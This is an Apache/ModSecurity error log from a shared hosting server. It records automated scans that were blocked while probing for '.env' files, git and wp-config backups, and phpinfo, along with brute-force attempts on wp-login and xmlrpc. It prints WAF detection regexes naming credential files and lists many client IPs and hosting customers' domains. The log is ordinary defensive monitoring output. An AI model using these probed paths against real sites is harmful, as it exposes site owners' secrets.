[Tue May 26 14:17:03.541611 2026] [security2:error] [pid 598542:tid 598679] [client 45.148.10.95:1708] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.git/config.old"] [unique_id "ahVeB_4iWyZxnXeAW3JWuAAAAAc"]
[Tue May 26 14:17:03.574854 2026] [security2:error] [pid 598542:tid 598699] [client 173.239.240.46:46521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVeB_4iWyZxnXeAW3JWpAAAABs"]
[Tue May 26 14:17:03.610620 2026] [security2:error] [pid 598542:tid 598739] [client 173.239.240.42:35685] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVeB_4iWyZxnXeAW3JWpQAAAEM"]
[Tue May 26 14:17:03.656779 2026] [security2:error] [pid 598542:tid 598688] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeB_4iWyZxnXeAW3JWmwAAABA"]
[Tue May 26 14:17:04.276327 2026] [security2:error] [pid 598542:tid 598714] [client 85.11.167.19:49258] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "webmail.ndequipments.com"] [uri "/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JW7QAAACo"]
[Tue May 26 14:17:04.362695 2026] [autoindex:error] [pid 598542:tid 598717] [client 45.148.10.95:2194] AH01276: Cannot serve directory /home2/jhonwy9v/dimensioncorporativa.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:17:04.363892 2026] [security2:error] [pid 598542:tid 598741] [client 45.148.10.95:2144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVeCP4iWyZxnXeAW3JW9QAAAEU"]
[Tue May 26 14:17:04.464240 2026] [security2:error] [pid 598542:tid 598768] [client 45.148.10.95:2242] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/API/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JW-QAAAGA"]
[Tue May 26 14:17:04.591177 2026] [security2:error] [pid 598542:tid 598746] [client 45.148.10.95:2324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/BACKEND/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXBwAAAEo"]
[Tue May 26 14:17:04.605617 2026] [security2:error] [pid 598542:tid 598719] [client 45.148.10.95:2326] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/ADMIN/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXCQAAAC8"]
[Tue May 26 14:17:04.612530 2026] [security2:error] [pid 598542:tid 598747] [client 45.148.10.95:2242] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/BACK/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXCgAAAEs"]
[Tue May 26 14:17:04.641301 2026] [security2:error] [pid 598542:tid 598780] [client 202.141.30.10:35521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeCP4iWyZxnXeAW3JXAQAAAGw"]
[Tue May 26 14:17:04.641425 2026] [security2:error] [pid 598542:tid 598780] [client 202.141.30.10:35521] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeCP4iWyZxnXeAW3JXAQAAAGw"]
[Tue May 26 14:17:04.690441 2026] [security2:error] [pid 598542:tid 598698] [client 45.148.10.95:2312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/BE/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXDgAAABo"]
[Tue May 26 14:17:04.761667 2026] [security2:error] [pid 598542:tid 598763] [client 45.148.10.95:2242] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/APP/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXEAAAAFs"]
[Tue May 26 14:17:04.771951 2026] [security2:error] [pid 598542:tid 598752] [client 45.148.10.95:2350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/Backend/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXEQAAAFA"]
[Tue May 26 14:17:04.777479 2026] [security2:error] [pid 598542:tid 598685] [client 45.148.10.95:2376] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/Be/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXEgAAAA0"]
[Tue May 26 14:17:04.779459 2026] [security2:error] [pid 598542:tid 598687] [client 45.148.10.95:2412] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/Api/.env"] [unique_id "ahVeCP4iWyZxnXeAW3JXEwAAAA8"]
[Tue May 26 14:17:05.280114 2026] [security2:error] [pid 598542:tid 598721] [client 45.148.10.95:2564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVeCf4iWyZxnXeAW3JXOwAAADE"]
[Tue May 26 14:17:05.476754 2026] [security2:error] [pid 598542:tid 598777] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeCf4iWyZxnXeAW3JXLAAAAGk"]
[Tue May 26 14:17:07.790609 2026] [security2:error] [pid 598542:tid 598756] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeC_4iWyZxnXeAW3JXbgAAAFQ"]
[Tue May 26 14:17:09.077010 2026] [security2:error] [pid 598542:tid 598738] [client 8.219.79.215:55150] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.65"] [uri "/index.cgi"] [unique_id "ahVeDf4iWyZxnXeAW3JXnQAAAEI"]
[Tue May 26 14:17:09.083495 2026] [security2:error] [pid 598542:tid 598764] [client 8.219.79.215:39278] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.85"] [uri "/index.cgi"] [unique_id "ahVeDf4iWyZxnXeAW3JXoAAAAFw"]
[Tue May 26 14:17:09.577754 2026] [security2:error] [pid 598542:tid 598784] [client 85.11.167.19:49268] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "webmail.ndequipments.com"] [uri "/"] [unique_id "ahVeDf4iWyZxnXeAW3JXrgAAAHA"]
[Tue May 26 14:17:10.297712 2026] [security2:error] [pid 598542:tid 598781] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeDf4iWyZxnXeAW3JXvAAAAG0"]
[Tue May 26 14:17:11.988729 2026] [fcgid:warn] [pid 598542:tid 598702] (70014)End of file found: [client 199.45.154.138:44796] mod_fcgid: can't get data from http client
[Tue May 26 14:17:12.620842 2026] [security2:error] [pid 598542:tid 598694] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeEP4iWyZxnXeAW3JX9AAAABY"]
[Tue May 26 14:17:13.903208 2026] [security2:error] [pid 598542:tid 598633] [remote 74.7.241.58:42550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVeEf4iWyZxnXeAW3JYIAAAcFo"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common/Editor/Full_Site
[Tue May 26 14:17:14.187800 2026] [security2:error] [pid 598542:tid 598680] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeEf4iWyZxnXeAW3JYHwAAAAg"]
[Tue May 26 14:17:15.573556 2026] [security2:error] [pid 598542:tid 598733] [client 202.141.30.10:35424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeE_4iWyZxnXeAW3JYYQAAAD0"]
[Tue May 26 14:17:15.574279 2026] [security2:error] [pid 598542:tid 598733] [client 202.141.30.10:35424] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeE_4iWyZxnXeAW3JYYQAAAD0"]
[Tue May 26 14:17:15.956573 2026] [security2:error] [pid 598542:tid 598618] [remote 64.188.91.103:53173] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "landsonlogistics.com"] [uri "/wp-content/plugins/fusion-builder/readme.txt"] [unique_id "ahVeE_4iWyZxnXeAW3JYcwAAI0s"]
[Tue May 26 14:17:16.057920 2026] [security2:error] [pid 598542:tid 598740] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeE_4iWyZxnXeAW3JYZwAAAEQ"]
[Tue May 26 14:17:16.353490 2026] [security2:error] [pid 598542:tid 598781] [client 91.227.114.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVeFP4iWyZxnXeAW3JYfQAAAG0"]
[Tue May 26 14:17:16.428923 2026] [security2:error] [pid 598542:tid 598635] [remote 178.156.182.155:36598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVeFP4iWyZxnXeAW3JYgQAAV1w"]
[Tue May 26 14:17:17.010448 2026] [security2:error] [pid 598542:tid 598692] [client 91.227.114.29:3920] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVeFP4iWyZxnXeAW3JYkQAAFG0"]
[Tue May 26 14:17:17.065292 2026] [security2:error] [pid 598542:tid 598549] [remote 216.73.216.240:35767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-website-disclaimer.php"] [unique_id "ahVeFf4iWyZxnXeAW3JYoQAABQY"]
[Tue May 26 14:17:18.170588 2026] [security2:error] [pid 598542:tid 598727] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeFf4iWyZxnXeAW3JY6wAAADc"]
[Tue May 26 14:17:20.853846 2026] [security2:error] [pid 598542:tid 598696] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeGP4iWyZxnXeAW3JZOwAAABg"]
[Tue May 26 14:17:22.673145 2026] [security2:error] [pid 598542:tid 598627] [remote 123.30.233.13:45172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVeGv4iWyZxnXeAW3JZcQAAXVQ"]
[Tue May 26 14:17:23.083134 2026] [security2:error] [pid 598542:tid 598551] [remote 103.95.119.103:39536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVeGv4iWyZxnXeAW3JZdgAAKwg"]
[Tue May 26 14:17:23.474690 2026] [security2:error] [pid 598542:tid 598759] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeG_4iWyZxnXeAW3JZgAAAAFc"]
[Tue May 26 14:17:25.419391 2026] [security2:error] [pid 598542:tid 598698] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeHP4iWyZxnXeAW3JZtAAAABo"]
[Tue May 26 14:17:26.741403 2026] [security2:error] [pid 598542:tid 598775] [client 202.141.30.10:35576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeHv4iWyZxnXeAW3JZ1wAAAGc"]
[Tue May 26 14:17:26.741555 2026] [security2:error] [pid 598542:tid 598775] [client 202.141.30.10:35576] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeHv4iWyZxnXeAW3JZ1wAAAGc"]
[Tue May 26 14:17:27.755630 2026] [security2:error] [pid 598542:tid 598692] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeH_4iWyZxnXeAW3JZ6AAAABQ"]
[Tue May 26 14:17:28.721793 2026] [security2:error] [pid 598542:tid 598689] [client 62.244.225.226:60134] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVeIP4iWyZxnXeAW3JaDQAAABE"]
[Tue May 26 14:17:29.485995 2026] [security2:error] [pid 598542:tid 598734] [client 222.252.73.0:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeIf4iWyZxnXeAW3JaHQAAAD4"]
[Tue May 26 14:17:29.804006 2026] [security2:error] [pid 598542:tid 598693] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeIf4iWyZxnXeAW3JaKgAAABU"]
[Tue May 26 14:17:31.375260 2026] [security2:error] [pid 598542:tid 598785] [client 74.7.228.11:48772] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "amslca.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVeI_4iWyZxnXeAW3JangAAcRA"]
[Tue May 26 14:17:31.443460 2026] [security2:error] [pid 598542:tid 598795] [client 74.7.241.167:55166] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "amslca.com.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVeI_4iWyZxnXeAW3JaoAAAezo"]
[Tue May 26 14:17:31.896354 2026] [security2:error] [pid 598542:tid 598786] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeI_4iWyZxnXeAW3JapAAAAHI"]
[Tue May 26 14:17:31.944382 2026] [security2:error] [pid 598542:tid 598771] [client 4.201.75.230:28227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.d2cargo.com"] [uri "/wk/index.php"] [unique_id "ahVeI_4iWyZxnXeAW3JasAAAAGM"]
[Tue May 26 14:17:32.341069 2026] [security2:error] [pid 598542:tid 598680] [client 89.124.112.117:63178] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "89.124.112.117" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVeJP4iWyZxnXeAW3JatAAAAAg"], referer: https://www.bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 14:17:32.341209 2026] [security2:error] [pid 598542:tid 598680] [client 89.124.112.117:63178] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVeJP4iWyZxnXeAW3JatAAAAAg"], referer: https://www.bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 14:17:33.620261 2026] [security2:error] [pid 598542:tid 598604] [remote 167.71.130.119:52422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVeJf4iWyZxnXeAW3Ja1gAAfT0"]
[Tue May 26 14:17:34.239163 2026] [security2:error] [pid 598542:tid 598789] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeJf4iWyZxnXeAW3Ja5QAAAHU"]
[Tue May 26 14:17:37.333564 2026] [security2:error] [pid 598542:tid 598682] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeKP4iWyZxnXeAW3JbMAAAAAo"]
